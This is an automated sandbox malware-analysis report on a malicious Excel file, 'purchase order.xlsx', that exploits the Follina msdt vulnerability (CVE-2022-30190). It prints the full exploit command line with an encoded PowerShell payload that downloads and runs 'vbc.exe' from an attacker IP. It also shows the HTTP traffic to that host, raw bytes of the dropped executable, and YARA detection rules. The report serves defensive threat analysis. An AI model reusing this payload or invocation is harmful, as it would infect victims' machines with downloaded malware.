Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase order.xlsx

Overview

General Information

Sample Name:purchase order.xlsx
Analysis ID:653502
MD5:a8930c1fcd80e9965ae26446afb717f6
SHA1:0cbf04bf7fc8522ab983f0246357fa70a85ee56b
SHA256:c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
Tags:VelvetSweatshopxlsx
Infos:

Detection

Follina CVE-2022-30190
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 1388 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • msdt.exe (PID: 6596 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 2436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6112 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6460 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x46b6:$a: PCWDiagnostic
  • 0x1cf4:$sa1: msdt.exe
  • 0x1d30:$sa1: msdt.exe
  • 0x24b4:$sa1: msdt.exe
  • 0x3c55:$sa1: msdt.exe
  • 0x1d44:$sa3: ms-msdt
  • 0x3c5f:$sa3: ms-msdt
  • 0x1e08:$sb3: IT_BrowseForFile=
  • 0x3cc1:$sb3: IT_BrowseForFile=
0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0xa2ae:$a: PCWDiagnostic
    • 0x5e78:$sa1: msdt.exe
    • 0x1908e:$sa1: msdt.exe
    • 0x22c58:$sa1: msdt.exe
    • 0x22e14:$sa1: msdt.exe
    • 0x272c0:$sb3: IT_BrowseForFile=
    0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        Click to see the 1 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: purchase order.xlsxReversingLabs: Detection: 17%

        Exploits

        barindex
        Source: Yara matchFile source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

        Software Vulnerabilities

        barindex
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
        Source: global trafficTCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80
        Source: excel.exeMemory has grown: Private usage: 1MB later: 67MB
        Source: global trafficHTTP traffic detected: GET /shipping_invc/document.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /870/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.119.48Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Jun 2022 08:46:37 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Tue, 28 Jun 2022 02:41:13 GMTETag: "6d600-5e278f84f0321"Accept-Ranges: bytesContent-Length: 448000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00 00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06 80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 c0 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 13 00 00 0a 00 00 02 28 09 00 00 06 00 7e 02 00 00 04 74 13 00 00 01 19 8d 12 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 1f 00 00 70 a2 25 18 72 31 00 00 70 a2 28 14 00 00 0a 26 02 72 51 00 00 70 02 28 02 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 06 00 00 04 02 28 05 00 00 06 6f 16 00 00 0a 00 02 7b 07 00 00 04 72 65 00 00 70 02 28 03 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 08 00 00 04 02 28 06 00 00 06 6f 16 00 00 0a 00 02 7b 09 00 00 04 02 28 07 00 00 06 6f 16 00 00 0a 00 02 7b 0a 00 00 04 02 28 04 00 00 06 6f 16 00 00 0a 00 2a 13 30 03 00 60 00 00 00 01 00 00 11 00 28 17 00 00 0a d0 05 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f 1a 00 00 0a 72 7d 00 00 70 28 1b 00 00 0a 0d 09 2c 0b 00 08 6f 1a 00 00 0a 13 04 2b 14 00 28 17 00 00 0a 6
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.48
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.aadrm.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.office.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.onedrive.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://augloop.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.entity.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cortana.ai/api
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://cr.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://directory.services.
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.windows.net
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://graph.windows.net/
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
